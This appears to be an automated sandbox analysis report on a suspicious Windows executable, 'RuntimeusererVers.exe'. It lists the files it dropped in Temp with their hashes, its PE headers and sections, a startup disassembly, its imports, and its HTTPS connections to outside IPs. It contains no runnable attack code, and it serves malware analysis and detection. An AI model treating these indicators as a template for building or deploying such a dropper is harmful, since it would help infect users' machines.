                                                                                                                                                                                                                                        Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                        MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                        SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                        SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                        SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                                        MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                                        SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                                        SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                                        SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.99601949446881
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win64 Executable Console (202006/5) 77.37%
                                                                                                                                                                                                                                        • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                                        File name:RuntimeusererVers.exe
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5:4fd34971f2551e33806360ba5ee86e5e
                                                                                                                                                                                                                                        SHA1:a3f2fe7d770d45c0b98bdbdf3322614582e41d59
                                                                                                                                                                                                                                        SHA256:e82fe9ce4fec710c6f02dc3ed738e5a88955d4d938957ec2b49119d5018ecb81
                                                                                                                                                                                                                                        SHA512:1c01226cb0a061675a8af6db24dea570881bbd7a2d6c8e21aaf51884bf4b64a2011dcc881507fb0b0a0191f8dc180831833eb175f07d6fdee72ed11748183281
                                                                                                                                                                                                                                        SSDEEP:393216:85CCDJlS/FyOUUGafnbRngsndGKLYHSJj:8oCytjGafSsdx4k
                                                                                                                                                                                                                                        TLSH:A1D6338CF1B202F9F339C4B898651999D696BC25234053A707F4B7F97DB3AE47D29220
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................U............&W......&.......&.......&.......................!.......!......Rich............PE..d..
                                                                                                                                                                                                                                        Icon Hash:9d2359a5a6a55b26
                                                                                                                                                                                                                                        Entrypoint:0x14000c59c
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x67367342 [Thu Nov 14 22:01:38 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:b2e44a6d3c3de37e08023deb2b2f60a9
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                        call 00007FE9E5073DA0h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                        jmp 00007FE9E50739C7h
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                        call 00007FE9E5074400h
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        je 00007FE9E5073B73h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                        jmp 00007FE9E5073B57h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        cmp ecx, eax
                                                                                                                                                                                                                                        je 00007FE9E5073B66h
                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        cmpxchg dword ptr [00022A9Ch], ecx
                                                                                                                                                                                                                                        jne 00007FE9E5073B40h
                                                                                                                                                                                                                                        xor al, al
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                        mov al, 01h
                                                                                                                                                                                                                                        jmp 00007FE9E5073B49h
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                        test ecx, ecx
                                                                                                                                                                                                                                        jne 00007FE9E5073B59h
                                                                                                                                                                                                                                        mov byte ptr [00022A85h], 00000001h
                                                                                                                                                                                                                                        call 00007FE9E50740EDh
                                                                                                                                                                                                                                        call 00007FE9E50745D8h
                                                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                                                        jne 00007FE9E5073B56h
                                                                                                                                                                                                                                        xor al, al
                                                                                                                                                                                                                                        jmp 00007FE9E5073B66h
                                                                                                                                                                                                                                        call 00007FE9E507B4DBh
                                                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                                                        jne 00007FE9E5073B5Bh
                                                                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                                                                        call 00007FE9E50745E8h
                                                                                                                                                                                                                                        jmp 00007FE9E5073B3Ch
                                                                                                                                                                                                                                        mov al, 01h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                                        cmp byte ptr [00022A4Ch], 00000000h
                                                                                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                                                                                        jne 00007FE9E5073BB9h
                                                                                                                                                                                                                                        cmp ecx, 01h
                                                                                                                                                                                                                                        jnbe 00007FE9E5073BBCh
                                                                                                                                                                                                                                        call 00007FE9E5074376h
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        je 00007FE9E5073B7Ah
                                                                                                                                                                                                                                        test ebx, ebx
                                                                                                                                                                                                                                        jne 00007FE9E5073B76h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        lea ecx, dword ptr [00022A36h]
                                                                                                                                                                                                                                        call 00007FE9E507B2FAh
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        jne 00007FE9E5073B62h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        lea ecx, dword ptr [00022A3Eh]
                                                                                                                                                                                                                                        call 00007FE9E5073BEAh
                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2cf040x3c.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000xcecd98.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x410000x17ac.pdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd300000x684.reloc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2af400x1c.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ae000x140.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x210000x2d8.rdata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        .text0x10000x1fc900x1fe005772491340cfe81e6de84ce2e8905aa3False0.5641084558823529data6.502446284545095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rdata0x210000xc89a0xca0056e965ade0cf76c53513a74c4f508fcaFalse0.47762608292079206data5.130695219936989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .data0x2e0000x12e600xc00f9a6d5bad872353804a874c215e16cb0False0.13736979166666666data1.9572528860448992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .pdata0x410000x17ac0x1800a27677e2df37cb566c946e496bef440bFalse0.48193359375PEX Binary Archive5.210452915848361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .rsrc0x430000xcecd980xcece0072300b9b9f922fbb3a2bac93973ae152unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        .reloc0xd300000x6840x80077d0e2d4a30e95c86627483da2995014False0.5107421875data4.935886757432297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_ICON0x431f00x34acPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9788638386235539
                                                                                                                                                                                                                                        RT_ICON0x4669c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.1274896265560166
                                                                                                                                                                                                                                        RT_ICON0x48c440x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.19113508442776736
                                                                                                                                                                                                                                        RT_ICON0x49cec0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m0.2725409836065574
                                                                                                                                                                                                                                        RT_ICON0x4a6740x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.41134751773049644
                                                                                                                                                                                                                                        RT_RCDATA0x4aadc0xce4e78data1.0002832412719727
                                                                                                                                                                                                                                        RT_GROUP_ICON0xd2f9540x4cdata0.7763157894736842
                                                                                                                                                                                                                                        RT_MANIFEST0xd2f9a00x3f8ASCII text, with very long lines (1016), with no line terminators0.4655511811023622
                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        SHELL32.dllSHFileOperationW, SHGetFolderPathW
                                                                                                                                                                                                                                        KERNEL32.dllSetLastError, WriteConsoleW, CreateDirectoryW, SizeofResource, SetConsoleCtrlHandler, GetCommandLineW, GetStdHandle, WriteFile, TerminateProcess, GetModuleFileNameW, SetEnvironmentVariableW, GetTempPathW, FindResourceA, WaitForSingleObject, CreateFileW, GetFileAttributesW, Sleep, GetLastError, LockResource, CloseHandle, LoadResource, GetProcAddress, GetCurrentProcessId, CreateProcessW, WideCharToMultiByte, GetSystemTimeAsFileTime, FormatMessageA, GetExitCodeProcess, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, HeapReAlloc, RtlUnwindEx, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, EncodePointer, RaiseException, RtlPcToFileHeader, ExitProcess, GetModuleHandleExW, GetCommandLineA, HeapAlloc, MultiByteToWideChar, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, HeapSize
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.911715984 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.911772966 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.911847115 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.912623882 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.912641048 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.066972971 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.067869902 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.067907095 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.069376945 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.069443941 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.070673943 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.070764065 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.070841074 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.070852995 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.114056110 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.328433990 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.328511953 CET44349734159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.328604937 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.329353094 CET49734443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.351618052 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.351661921 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.351747036 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.352103949 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:15.352113962 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.443304062 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.443789005 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.443811893 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.444899082 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.444979906 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.445740938 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.445864916 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.445873976 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.489053965 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.489084005 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.536022902 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697065115 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697151899 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697191954 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697770119 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.733345985 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.733390093 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.733463049 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.734194994 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.734209061 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.340249062 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.349421024 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.349452972 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.350730896 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.350807905 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404357910 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404577017 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404824972 CET49751443192.168.2.10162.159.138.232
